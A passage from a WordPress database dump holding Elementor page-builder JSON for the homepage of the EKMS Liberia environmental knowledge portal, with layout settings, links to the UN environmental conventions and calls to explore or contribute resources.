"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19070,2792,'_elementor_version','2.7.5'),(19071,2792,'_elementor_template_type','wp-page'),(19072,2792,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19076,2793,'_wp_page_template','default'),(19077,2793,'_elementor_edit_mode','builder'),(19078,2793,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"160\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate 